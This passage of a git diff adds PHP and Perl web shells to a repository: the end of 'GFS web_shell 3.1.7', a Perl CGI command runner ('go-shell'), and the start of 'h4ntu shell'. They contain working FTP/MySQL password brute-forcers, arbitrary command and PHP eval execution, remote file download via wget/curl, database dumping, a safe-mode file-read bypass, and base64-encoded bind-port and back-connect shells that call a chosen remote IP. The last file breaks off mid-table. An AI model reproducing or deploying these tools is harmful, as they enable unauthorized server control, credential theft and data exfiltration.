+ }elseif($type2=="login:empty"){
+  if($type=="ftp"){
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center>BruteFTP:  </td><td alling=center><b><font color=green> localhost </b></font></td></tr>";
+   $mass=pwd_conwert();
+   foreach($mass as $i=>$v){
+    if($v!=""){
+     $conn_id=ftp_connect($host);
+     if(!$conn_id){ die("Coud not connect");}
+     if (ftp_login($conn_id, $v, "")){
+      echo "<tr><td alling=center> ".$v." : empty </td><td alling=center><b><font color=green> OK </b></font></td></tr>";
+     }
+     ftp_close($conn_id);
+    }
+   }
+   echo "</table>";
+  }elseif($type=="mysql"){
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center>BruteMySQL:  </td><td alling=center><b><font color=green> localhost </b></font></td></tr>";
+   $mass=pwd_conwert();
+   foreach($mass as $i=>$v){
+    if($v!=""){
+     $conn_id=mysql_connect($host,$v,"");
+     if($conn_id){
+      echo "<tr><td alling=center> ".$v." : empty </td><td alling=center><b><font color=green> OK </b></font></td></tr>";
+     }
+     mysql_close($conn_id);
+    }
+   }
+   echo "</table>";
+  }
+ }elseif($type2=="login:number"){
+  if($type=="ftp"){
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center>BruteFTP:  </td><td alling=center><b><font color=green> localhost </b></font></td></tr>";
+   $mass=pwd_conwert();
+   foreach($mass as $i=>$v){
+    if($v!=""){
+     $conn_id=ftp_connect($host);
+     if(!$conn_id){ die("Coud not connect");}
+     for($j=0; $j<=999; $j++){
+      if (ftp_login($conn_id, $v, "$j")){
+       echo "<tr><td alling=center> ".$v." : $j </td><td alling=center><b><font color=green> OK </b></font></td></tr>";
+      }
+      ftp_close($conn_id);
+     }
+    }
+   }
+   echo "</table>";
+  }elseif($type=="mysql"){
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center>BruteMySQL:  </td><td alling=center><b><font color=green> localhost </b></font></td></tr>";
+   $mass=pwd_conwert();
+   foreach($mass as $i=>$v){
+    if($v!=""){
+     for($j=0; $j<=999; $j++){
+      $conn_id=mysql_connect($host,$v,"$j");
+      if($conn_id){
+        echo "<tr><td alling=center> ".$v." : $j </td><td alling=center><b><font color=green> OK </b></font></td></tr>";
+       }
+       mysql_close($conn_id);
+     }
+    }
+   }
+   echo "</table>";
+  }
+ }elseif($type2=="login:nigol"){
+  if($type=="ftp"){
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center>BruteFTP:  </td><td alling=center><b><font color=green> localhost </b></font></td></tr>";
+   $mass=pwd_conwert();
+   foreach($mass as $i=>$v){
+    if($v!=""){
+     $conn_id=ftp_connect($host);
+     if(!$conn_id){ die("Coud not connect");}
+     if (ftp_login($conn_id, $v, strrev($v))){
+      echo "<tr><td alling=center> ".$v." : ".strrev($v)." </td><td alling=center><b><font color=green> OK </b></font></td></tr>";
+     }else
+      echo "<tr><td alling=center> ".$v." : ".strrev($v)." </td><td alling=center><b><font color=red> NO </b></font></td></tr>";
+     ftp_close($conn_id);
+    }
+   }
+   echo "</table>";
+  }elseif($type=="mysql"){
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center>BruteMySQL:  </td><td alling=center><b><font color=green> localhost </b></font></td></tr>";
+   $mass=pwd_conwert();
+   foreach($mass as $i=>$v){
+    if($v!=""){
+     $conn_id=mysql_connect($host,$v,strrev($v));
+     if($conn_id){
+      echo "<tr><td alling=center> ".$v." : ".strrev($v)." </td><td alling=center><b><font color=green> OK </b></font></td></tr>";
+     }else
+      echo "<tr><td alling=center> ".$v." : ".strrev($v)." </td><td alling=center><b><font color=red> NO </b></font></td></tr>";
+     mysql_close($conn_id);
+    }
+   }
+   echo "</table>";
+  }
+ }elseif($type2=="login:lib"){
+  $input=file($file);
+  foreach($input as $i=>$v){
+   $word=explode(":",$v);
+   $res.=$word[0]." ".$word[1]." ";
+  }
+  $lib=explode(" ",$res);
+  if($type=="ftp"){
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center>BruteFTP:  </td><td alling=center><b><font color=green> localhost </b></font></td></tr>";
+   $mass=pwd_conwert();
+   foreach($mass as $i=>$v){
+    if($v!=""){
+     foreach($lib as $kk=>$vv){
+      $conn_id=ftp_connect($host);
+      if(!$conn_id){ die("Coud not connect");}
+      if (ftp_login($conn_id, $v, $lib[$kk])){
+       echo "<tr><td alling=center> ".$v." : ".$lib[$kk]." </td><td alling=center><b><font color=green> OK </b></font></td></tr>";
+      }
+      ftp_close($conn_id);
+     }
+    }
+   }
+   echo "</table>";
+  }elseif($type=="mysql"){
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center>BruteMySQL:  </td><td alling=center><b><font color=green> localhost </b></font></td></tr>";
+   $mass=pwd_conwert();
+   foreach($mass as $i=>$v){
+    if($v!=""){
+     foreach($lib as $kk=>$vv){
+      $conn_id=mysql_connect($host,$v,$lib[$kk]);
+      if($conn_id){
+       echo "<tr><td alling=center> ".$v." : ".$lib[$kk]." </td><td alling=center><b><font color=green> OK </b></font></td></tr>";
+      }
+      mysql_close($conn_id);
+     }
+    }
+   }
+   echo "</table>";
+  }
+ }elseif($type2=="lib:lib"){
+  $input=file($file);
+  foreach($input as $i=>$v){
+   $word=explode(":",$v);
+   $res.=$word[0]." ".$word[1]." ";
+  }
+  $lib=explode(" ",$res);
+  if($type=="ftp"){
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center>BruteFTP:  </td><td alling=center><b><font color=green> localhost </b></font></td></tr>";
+   $count_lib=count($lib);
+   for($kk=0; $kk<$count_lib; $kk=$kk+2){
+    $conn_id=ftp_connect($host);
+    if(!$conn_id){ die("Coud not connect");}
+    if (ftp_login($conn_id,$lib[$kk],$lib[$kk+1])){
+     echo "<tr><td alling=center> ".$lib[$kk]." : ".$lib[$kk+1]." </td><td alling=center><b><font color=green> OK </b></font></td></tr>";
+    }
+    ftp_close($conn_id);
+   }
+   echo "</table>";
+  }elseif($type=="mysql"){
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center>BruteMySQL:  </td><td alling=center><b><font color=green> localhost </b></font></td></tr>";
+   $count_lib=count($lib);
+   for($kk=0; $kk<$count_lib; $kk=$kk+2){
+    if($lib[$kk]!=""){
+     $conn_id=mysql_connect($host,$lib[$kk],$lib[$kk+1]);
+     if($conn_id){
+      echo "<tr><td alling=center> ".$lib[$kk]." : ".$lib[$kk+1]." </td><td alling=center><b><font color=green> OK </b></font></td></tr>";
+     }
+     mysql_close($conn_id);
+    }
+   }
+  echo "</table>";
+  }
+ }
+}
+
+////////////////////////////////////////////////////////////////////////////////
+///////////////////////////////// ÊÎÄ //////////////////////////////////////////
+////////////////////////////////////////////////////////////////////////////////
+echo $HTML;
+echo "<font  face=Verdana size=2 color=blue><b>";
+echo (rep_char("&nbsp;",15));
+echo "GFS web_shell ver 3.1.7 </b></font>";
+echo "<hr size=3 color=black>";
+sysinfo();
+echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+echo "<table BORDER=1 align=center>";
+if($r_act=="nav" OR $r_act==NULL){
+ echo "<tr bgcolor=#ffff00><td alling=\"center\"><input type=radio checked name=\"r_act\" value=\"nav\"><b>Navigation</b></td>";
+}else
+ echo "<tr bgcolor=#ffff00><td alling=\"center\"><input type=radio name=\"r_act\" value=\"nav\"><b>Navigation</b></td>";
+if(!$safe_mode){
+ if($r_act=="bind"){
+  echo "<td alling=\"center\"><input type=radio checked name=\"r_act\" value=\"bind\"><b>BindPort</b></td>";
+ }else
+  echo "<td alling=\"center\"><input type=radio name=\"r_act\" value=\"bind\"><b>BindPort</b></td>";
+}
+
+if(function_exists(fsockopen)){
+ if($r_act=="port"){
+  echo "<td alling=\"center\"><input type=radio checked name=\"r_act\" value=\"port\"><b>PortScan</b></td>";
+ }else
+  echo "<td alling=\"center\"><input type=radio name=\"r_act\" value=\"port\"><b>PortScan</b></td>";
+}
+if($r_act=="brute"){
+ echo "<td alling=\"center\"><input type=radio checked name=\"r_act\" value=\"brute\"><b>Brute</b></td>";
+}else
+ echo "<td alling=\"center\"><input type=radio name=\"r_act\" value=\"brute\"><b>Brute</b></td>";
+if($r_act=="eval"){
+ echo "<td alling=\"center\"><input type=radio checked name=\"r_act\" value=\"eval\"><b>Eval</b></td>";
+}else
+ echo "<td alling=\"center\"><input type=radio name=\"r_act\" value=\"eval\"><b>Eval</b></td>";
+echo "<td><input type=submit name=\"b_act\" value=\"Change\"></td></tr></table></form>";
+################## ACTION ######################################################
+if($r_act=="nav" OR $r_act==NULL){
+ $box=$_POST['box'];
+ if($_POST['b_save']){
+  $res=save_file($_POST['text'],$_POST['fname'],$_POST['dname']);
+ }elseif($_POST['b_new_file']){
+  open_file($_POST['new'],"wb",$_POST['dname']);
+ }elseif($_POST['b_open_file']){
+  open_file($_POST['fname'],"r",$_POST['dname']);
+ }elseif($_POST['b_mail']){
+  $res="Function under construction!!!!!!!!!";
+ }elseif($_POST['b_run']){
+  chdir($_POST['wdir']);
+  $dir=getcwd();
+  $res=ex($_POST['cmd']);
+ }elseif($_POST['b_f_file']){
+  chdir($_POST['wdir']);
+  $dir=getcwd();
+  $res=ex("whereis ".$_POST['ffile']);
+ }elseif($_POST['b_upload']){
+  $s="Uploading file ".$_POST['lfilename']." use the ".$box;
+  $res=up_file($_POST['lfilename'],$_POST['tfilename'],$_POST['box']);
+ }elseif($_POST['b_mydb']){                              //Âûâîäèì ñïèñîê ÁÄ
+  $s="show_exists_db";
+  $res=db_show($_POST['host'], $_POST['username'], $_POST['pass']);
+ }elseif ($_POST['b_runsql']){                           //Âûïîëíÿåì SQL çàïğîñ
+  $s="SQL: ".$sql;
+  $res=run_sql($_POST['sql'], $_POST['dbname'],$_POST['host'], $_POST['username'], $_POST['pass']);
+ }elseif($_POST['b_base']){                              //Âûâîäèì ñïèñîê òàáëèö
+  $s="show_exists_tables";
+  $res=show_tables($_POST['dbname'],$_POST['host'], $_POST['username'], $_POST['pass']);
+ }elseif($_POST['b_table']){                             //Âûâîäèì äàìï òàáëèöû
+  $s="Dump of ".$_POST['tablename'];
+  $tablename=$_POST['tablename'];
+  if ($tablename!=""){
+   $res=dump_table($_POST['tablename'], $_POST['dbname'],$_POST['host'], $_POST['username'], $_POST['pass']);
+  }else
+   $res="Select table!";
+ }elseif($_POST['b_safe_fuck']){                        //Îáõîä áåçîïàñíîãî ğåæèìà
+  $s="Open file ".$sfilename." with MySQL:";
+  $res=safe_mode_fuck($_POST['sfilename'],$_POST['host'], $_POST['username'], $_POST['pass'], $_POST['dbname']);
+ }elseif($_POST['b_dfilename']){                        //Îáõîä áåçîïàñíîãî ğåæèìà
+  $s="Dump in ".$dfilename." from ".$_POST['tablename'].":";
+  $res=run_sql("SELECT * INTO OUTFILE '".addslashes($_POST['dfilename'])."' FROM ".$_POST['tablename'], $_POST['dbname'],$_POST['host'], $_POST['username'], $_POST['pass']);
+ }
+ if ($host=="") {$host="localhost";}
+ if(isset($res)){
+  echo "<table BORDER=1 align=center>";
+  echo "<tr><td alling=center><b>".$s."</b></td></tr>";
+  echo "<tr><td alling=center><textarea name=\"text\" cols=90 rows=15>";
+  echo $res;
+  echo "</textarea></td></tr></table>";
+ }
+################## EXECUTE #####################################################
+ if(!$safe_mode){
+  $dir=getcwd();
+  echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+  echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">";
+  echo "<table BORDER=1 align=center>";
+  echo "<tr bgcolor=#ffff00><td alling=\"center\"><b><font  face=Verdana size=2>Run command: </b></td></tr><font size=-2>";
+  echo "<tr><td alling=\"center\"><input style='width:300px;' type=\"text\" value=\"\" name=\"cmd\"></td><td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Run\" name=\"b_run\"></td></tr>";
+  echo "<tr><td alling=\"center\"><input style='width:300px;' type=\"text\" value=\"$dir\" name=\"wdir\"></td>";
+  echo "</tr></table></form>";
+ }
+ echo "<hr size=3 color=black>";
+#################### UPLOAD ####################################################
+ echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+ echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">";
+ echo "<table BORDER=1 align=center>";
+ echo "<tr bgcolor=#ffff00><td alling=\"center\"><b><font  face=Verdana size=2>Upload files: </b></td></tr><font size=-2>";
+ if ($box==""){ $box="fopen";}
+ echo ("<tr><td alling=\"center\"><b>Use/from: </b><SELECT name=\"box\">");
+ echo("<OPTION>$box</option>");
+ echo("<OPTION value=\"PC\">PC</option>
+       <option value=\"WGET\">WGET</option><option value=\"FETCH\">
+       FETCH</option><option value=\"LYNX\">LYNX</option>
+       <option value=\"cURL\">cURL</option>
+       <option value=\"fopen\">fopen</option></select></td></tr>");
+ echo "<tr><td alling=\"center\"><b>File: </b><input type=\"text\" name=\"lfilename\" size=50></td></tr>";
+ echo "<tr><td alling=\"center\"><b>Target: </b><input type=\"text\" name=\"tfilename\"
+      size=30  value=\"$tfilename\"></td></tr>";
+ echo "<tr><td alling=\"center\"><input type=\"submit\" name=\"b_upload\" value=\"UPLOAD\"></td></tr></table></form></font></font>";
+ echo "<hr size=3 color=black>";
+##################### MySQL ####################################################
+ if(isset($_POST['host'])){
+  $host=$_POST['host'];
+ }
+ if(isset($_POST['dbname'])){
+  $dbname=$_POST['dbname'];
+ }
+ if(isset($_POST['tablename'])){
+  $tablename=$_POST['tablename'];
+ }
+ if(isset($_POST['sql'])){
+  $sql=$_POST['sql'];
+ }
+ if(isset($_POST['sfilename'])){
+  $filename=$_POST['sfilename'];
+ }
+ if(isset($_POST['dfilename'])){
+  $dfilename=$_POST['dfilename'];
+ }
+ if(isset($_POST['username'])){
+  $username=$_POST['username'];
+ }
+ if(isset($_POST['pass'])){
+  $pass=$_POST['pass'];
+ }
+ echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+ echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">";
+ echo "<table BORDER=1 align=center>";
+ echo "<tr bgcolor=#ffff00><td alling=\"center\"><b><font  face=Verdana size=2>MySQL DB connect: </b></td></tr><font size=-2>";
+ echo "<tr><td alling=\"center\"><b>Host name:</b></td>";
+ echo "<td alling=\"center\"><b>DB name:</b></td>";
+ echo "<td alling=\"center\"><b>Table name:</b></td>";
+ echo "<td alling=\"center\"><b>SQL command: </b></td></tr>";
+ echo ("<tr><td alling=\"center\"><input type=\"text\" name=\"host\" value=\"$host\"></td>");
+ echo ("<td alling=\"center\"><input type=\"text\" name=\"dbname\" value=\"$dbname\"></td>");
+ echo ("<td alling=\"center\"><input type=\"text\" name=\"tablename\" value=\"$tablename\"></td>");
+ echo ("<td alling=\"center\"><input type=\"text\" name=\"sql\" value=\"$sql\"></td></tr>");
+ echo "<tr><td alling=\"center\"><b>User name:</b></tb>";
+ echo "<td alling=\"center\"><input type=\"submit\" name=\"b_base\" value=\"Dump DB\"></td>";
+ echo "<td alling=\"center\"><input type=\"submit\" name=\"b_table\" value=\"Dump table\"></td>";
+ echo "<td alling=\"center\"><input type=\"submit\" name=\"b_runsql\" value=\"Run SQL\"></tb></tr>";
+ echo ("<tr><td alling=\"center\"><input type=\"text\" name=\"username\" value=\"$username\"></td><td alling=\"center\"></td><td alling=\"center\"><input type=\"submit\" name=\"b_dtable\" value=\"Download\"></td></tr>");
+ echo "<tr><td alling=\"center\"><b>Pass: </b></td>";
+ if ($safe_mode){
+  echo "<td alling=\"center\"><b>OpenFilename: </b></td><td alling=\"center\"><b>DumpFilename: </b></td></tr>";
+ }else
+  echo "<td alling=\"center\"></td><td alling=\"center\"><b>DumpFilename: </b></td></tr>";
+ echo ("<tr><td alling=\"center\"><input type=\"text\" name=\"pass\" value=\"$pass\"></td>");
+ if ($safe_mode){
+  echo "<td alling=\"center\"><input type=\"text\" name=\"sfilename\" value=\"$filename\"></td><td alling=\"center\"><input type=\"text\" name=\"b_dfilename\" value=\"$dfilename\"></td></tr>";
+ }else
+  echo "<td alling=\"center\"></td><td alling=\"center\"><input type=\"text\" name=\"dfilename\" value=\"$dfilename\"></td></tr>";
+ echo ("<tr><td alling=\"center\"><input type=\"submit\" name=\"b_mydb\" value=\"Show exists DB\"></td>");
+ if ($safe_mode){
+  echo ("<td alling=\"center\"><input type=\"submit\" name=\"b_safe_fuck\" value=\"SafeMode FileOpen\"></td>");
+ }else
+  echo "<td alling=\"center\"></td>";
+ echo("<td alling=\"center\"><input type=\"submit\" name=\"b_dfilename\" value=\"Dump table\"></td>");
+ echo "</tr></table></font></font>";
+ echo "<hr size=3 color=black>";
+################## NAVIGATION ##################################################
+ list_dir();
+}
+##################### PortScan #################################################
+if($r_act=="port"){
+ if($_POST['host']==""){
+  $host="localhost";
+ }else
+  $host=$_POST['host'];
+ echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+ echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">";
+ echo "<table BORDER=1 align=center>";
+ echo "<tr bgcolor=#ffff00><td alling=\"center\"><b><font  face=Verdana size=2>Scan host: </b></td></tr><font size=-2>";
+ echo "<tr><td alling=\"center\"><input style='width:300px;' type=\"text\" value=\"".$host."\" name=\"host\"></td><td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Scan\" name=\"b_scan\"></td></tr>";
+ echo "</tr></table></form>";
+ if($_POST['b_scan']){
+  portscan($host);
+ }
+}
+##################### PortBind #################################################
+if($r_act=="bind"){
+ if($_POST['b_bind']){
+  if($_POST['box']=="C++"){
+   save_file(base64_decode($port_c),"/var/tmp/gfs.c",getcwd());
+   ex("gcc /var/tmp/gfs.c");
+   unlink("/var/tmp/gfs.c");
+   ex("/var/tmp/a.out ".$_POST['port']." &");
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center><b>".$s."</b></td></tr>";
+   echo "<tr><td alling=center><textarea name=\"text\" cols=90 rows=15>";
+   echo ex("ps -aux | grep a.out");
+   echo "</textarea></td></tr></table>";
+  }
+  if($_POST['box']=="Perl"){
+   save_file(base64_decode($port_pl),"/var/tmp/gfs.pl",getcwd());
+   ex("perl /var/tmp/gfs.pl ".$_POST['port']." &");
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center><b>".$s."</b></td></tr>";
+   echo "<tr><td alling=center><textarea name=\"text\" cols=90 rows=15>";
+   echo ex("ps -aux | grep gfs.pl");
+   echo "</textarea></td></tr></table>";
+  }
+ }
+ if($_POST['b_connect']){
+  if($_POST['box']=="C++"){
+   save_file(base64_decode($back_connect_c),"/var/tmp/gfs.c",getcwd());
+   ex("gcc -o /var/tmp/gfs.c /var/tmp/gfs");
+   unlink("/var/tmp/gfs.c");
+   ex("/var/tmp/gfs ".$_POST['ip']." ".$_POST['port']." &");
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center><b>".$s."</b></td></tr>";
+   echo "<tr><td alling=center><textarea name=\"text\" cols=90 rows=15>";
+   echo "Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...";
+   echo "</textarea></td></tr></table>";
+  }
+  if($_POST['box']=="Perl"){
+   save_file(base64_decode($back_connect_pl),"/var/tmp/gfs.pl",getcwd());
+   ex("perl /var/tmp/gfs.pl ".$_POST['ip']." ".$_POST['port']." &");
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center><b>".$s."</b></td></tr>";
+   echo "<tr><td alling=center><textarea name=\"text\" cols=90 rows=15>";
+   echo "Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...";
+   echo "</textarea></td></tr></table>";
+  }
+ }
+ if($_POST['b_proxy']){
+  save_file(stripslashes(base64_decode($prx1).$_POST['port'].base64_decode($prx2)),"/var/tmp/gfs.pl",getcwd());
+  ex("perl /var/tmp/gfs.pl");
+  echo "<table BORDER=1 align=center>";
+  echo "<tr><td alling=center><b>Proxy</b></td></tr>";
+  echo "<tr><td alling=center><textarea name=\"text\" cols=90 rows=15>";
+  echo ex("ps -aux | grep gfs.pl");
+  echo "</textarea></td></tr></table>";
+ }
+ echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+ echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">";
+ echo "<table BORDER=1 align=center>";
+ echo "<tr bgcolor=#ffff00><td alling=\"center\"><b><font  face=Verdana size=2>Bind Port: </b></td></tr><font size=-2>";
+ echo ("<tr><td alling=\"center\"><b>Use: </b><SELECT name=\"box\">");
+ echo("<OPTION value=\"C++\">C++</option>
+       <option value=\"Perl\">Perl</option></select></td></tr>");
+ echo "<tr><td alling=\"center\"><b><font  face=Verdana size=2>BindPort: </b></td></tr><font size=-2>";
+ echo "<tr><td alling=\"center\"><input style='width:300px;' type=\"text\" value=\"26660\" name=\"port\"></td><td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Bind\" name=\"b_bind\"></td></tr>";
+ echo "</tr></table></form>";
+ echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+ echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">";
+ echo "<table BORDER=1 align=center>";
+ echo "<tr bgcolor=#ffff00><td alling=\"center\"><b><font  face=Verdana size=2>Back connect: </b></td></tr><font size=-2>";
+ echo ("<tr><td alling=\"center\"><b>Use: </b><SELECT name=\"box\">");
+ echo("<OPTION value=\"C++\">C++</option>
+       <option value=\"Perl\">Perl</option></select></td></tr>");
+ echo "<tr><td alling=\"center\"><b><font  face=Verdana size=2>RemotePort: </b></td></tr><font size=-2>";
+ echo "<tr><td alling=\"center\"><input style='width:300px;' type=\"text\" value=\"26660\" name=\"port\"></td></tr>";
+ echo "<tr><td alling=\"center\"><b><font  face=Verdana size=2>RemoteIp: </b></td></tr><font size=-2>";
+ echo "<tr><td alling=\"center\"><input style='width:300px;' type=\"text\" value=\"".$REMOTE_ADDR."\" name=\"ip\"></td><td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Connect\" name=\"b_connect\"></td></tr>";
+ echo "</tr></table></form>";
+ echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+ echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">";
+ echo "<table BORDER=1 align=center>";
+ echo "<tr bgcolor=#ffff00><td alling=\"center\"><b><font  face=Verdana size=2>HTTPProxy: </b></td></tr><font size=-2>";
+ echo "<tr><td alling=\"center\"><b><font  face=Verdana size=2>ProxyPort: </b></td></tr><font size=-2>";
+ echo "<tr><td alling=\"center\"><input style='width:300px;' type=\"text\" value=\"46660\" name=\"port\"></td><td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Create\" name=\"b_proxy\"></td></tr>";
+ echo "</tr></table></form>";
+}
+##################### Brute ####################################################
+if($r_act=="brute"){
+ if(isset($_POST['brute_host'])){
+  $host=$_POST['brute_host'];
+ }else
+  $host="localhost";
+ if(isset($_POST['lib'])){
+  $lib=$_POST['lib'];
+ }else
+  $lib="  [library]";
+ echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+ echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">";
+ echo "<table BORDER=1 align=center>";
+ echo "<tr bgcolor=#ffff00><td alling=\"center\"><b><font  face=Verdana size=2>Brute: </b></td></tr><font size=-2>";
+ echo "<tr bgcolor=#00ff00><td alling=\"center\"><b>Example lib: </b>login:pass</td></tr>";
+ echo ("<tr><td alling=\"center\"><b>Bryte type: </b><SELECT name=\"box1\">");
+ echo("<option value=\"login:login\">login:login</option>
+       <option value=\"login:nigol\">login:nigol</option>
+       <option value=\"login:empty\">login:empty</option>
+       <option value=\"login:number\">login:number</option>");
+ if(function_exists(fopen)){
+  echo "<option value=\"login:lib\">login:lib</option>";
+  echo "<option value=\"lib:lib\">lib:lib</option>";
+ }
+ echo ("</select></td></tr>");
+ echo ("<tr><td alling=\"center\"><b>Use: </b><SELECT name=\"box\">");
+ echo("<OPTION value=\"mysql\">mysql</option>
+       <option value=\"ftp\">ftp</option>");
+// if(function_exists(ssh2_connect)){
+//  echo "<option value=\"ssh\">ssh</option>";
+// }
+ echo ("</select></td>");
+ echo("<td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Brute\" name=\"b_brute\"></td></tr><tr><td alling=\"center\"><b>Host: </b><input type=\"text\" name=\"brute_host\" value=\"".$host."\">(for lib:lib)</td></tr>");
+ if(function_exists(fopen)){
+  echo "<td alling=\"center\"><b>From lib (if set): <input type=\"text\" name=\"lib\" value=\"".$lib."\">";
+ }
+ echo ("</table></form>");
+ if($_POST['b_brute']){
+  brute($_POST['box'],$_POST['box1'],$_POST['brute_host'],$_POST['lib']);
+ }
+}
+#################### Eval ######################################################
+if($r_act=="eval"){
+ if($_POST['b_eval']){
+  $eval=str_replace("<?","",$_POST['php_eval']);
+  $eval=str_replace("?>","",$eval);
+  eval($eval);
+ }
+ echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+ echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">";
+ echo "<table BORDER=1 align=center>";
+ echo "<tr bgcolor=#ffff00><td alling=\"center\"><b><font  face=Verdana size=2>Eval php: </b></td></tr><font size=-2>";
+ echo "<tr><td alling=\"center\"><textarea name=\"php_eval\" cols=90 rows=15></textarea></td></tr><tr><td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Eval\" name=\"b_eval\"></td></tr>";
+ echo "</tr></table></form>";
+}
+
+echo "<hr size=3 color=black>";
+echo "<font  face=Verdana size=2 color=blue><b>";
+echo (rep_char("&nbsp",15));
+echo "(c) GFS</font>";
+echo (rep_char("&nbsp",15));
+echo "<a href=\"http://www.gfs-team.ru\">www.gfs-team.ru</a>";
+echo "<hr size=3 color=black>";
+?>
diff --git a/php/go-shell.php b/php/go-shell.php
new file mode 100644
index 0000000..6f145a0
--- /dev/null
+++ b/php/go-shell.php
@@ -0,0 +1,87 @@
+#!/usr/bin/perl
+
+#change this password; for power security - delete this file =)
+$pwd='adm';
+
+print "Content-type: text/html\n\n";
+&read_param();
+if (!defined$param{dir}){$param{dir}="/"};
+if (!defined$param{cmd}){$param{cmd}="ls -la"};
+if (!defined$param{pwd}){$param{pwd}='ter'};
+
+print << "[kalabanga]";
+<head>
+<title>GO.cgi</title>
+<style>
+BODY, TD { font-family: Tahoma; font-size: 12px; }
+INPUT.TEXT  {
+font-family : Arial;
+font-size : 8pt;
+color : Black;
+width : 100%;
+background-color : #F1F1F1;
+border-style : solid;
+border-width : 0px;
+border-color : Silver;
+}
+INPUT.BUTTON  {
+font-family : Arial;
+font-size : 8pt;
+width : 100px;
+border-width : 1px;
+color : Black;
+background-color : D1D1D1;
+border-color : silver;
+border-style : solid;
+}
+</style>
+</head>
+<body bgcolor=#B9B9B9>
+Current request is:
+<table width=100% bgcolor=D9D9D9><tr><td>
+[kalabanga]
+
+print "cd $param{dir}&&$param{cmd}";
+
+print << "[kalabanga]";
+</td></tr></table>
+Answer for current request is:
+<table width=100% bgcolor=D9D9D9><tr><td><pre>
+[kalabanga]
+
+if ($param{pwd} ne $pwd){print "user invalid, please replace user";}
+else {
+open(FILEHANDLE, "cd $param{dir}&&$param{cmd}|");
+while ($line=<FILEHANDLE>){print "$line";};
+close (FILEHANDLE);
+};
+
+print << "[kalabanga]";
+</pre></td></tr></table>
+<form action=go.cgi>
+Password:
+<input type=text class="TEXT" name=pwd value=$param{pwd}>
+Dir for next request:
+<input type=text class="TEXT" name=dir value=$param{dir}>
+next request:
+<input type=text class="TEXT" name=cmd value=$param{cmd}>
+<input type=submit class="button" value="Submit">
+<input type=reset class="button" value="Reset">
+</form>
+</body>
+</html>
+[kalabanga]
+
+sub read_param {
+$buffer = "$ENV{'QUERY_STRING'}";
+@pairs = split(/&/, $buffer);
+foreach $pair (@pairs)
+        {
+        ($name, $value) = split(/=/, $pair);
+        $name =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
+        $value =~ s/\+/ /g;
+        $value =~ s/%20/ /g;
+        $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
+        $param{$name} = $value;
+        }
+}
\ No newline at end of file
diff --git a/php/h4ntu shell [powered by tsoi].php b/php/h4ntu shell [powered by tsoi].php
new file mode 100644
index 0000000..eb61f3d
--- /dev/null
+++ b/php/h4ntu shell [powered by tsoi].php	
@@ -0,0 +1,78 @@
+<title>h4ntu shell [powered by tsoi]</title>
+<?php
+echo "<p><font size=2 face=Verdana><b>This Is The Server Information</b></font></p>";
+?>
+
+<?php
+  closelog( );
+  $user = get_current_user( );
+  $login = posix_getuid( );
+  $euid = posix_geteuid( );
+  $ver = phpversion( );
+  $gid = posix_getgid( );
+  if ($chdir == "") $chdir = getcwd( );
+  if(!$whoami)$whoami=exec("whoami");
+?>
+<meta name="generator" content="Namo WebEditor v5.0">
+<br>
+<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="0">
+<?php
+  $uname = posix_uname( );
+  while (list($info, $value) = each ($uname)) {
+?>
+  <TR>
+    <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><?= $info ?>: <?= $value ?></DIV></TD>
+  </TR>
+<?php
+  }
+?>
+  <TR>
+
+  <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>User Info:</b> uid=<?= $login ?>(<?= $whoami?>) euid=<?= $euid ?>(<?= $whoami?>) gid=<?= $gid ?>(<?= $whoami?>)</DIV></TD>
+  </TR>
+  <TR>
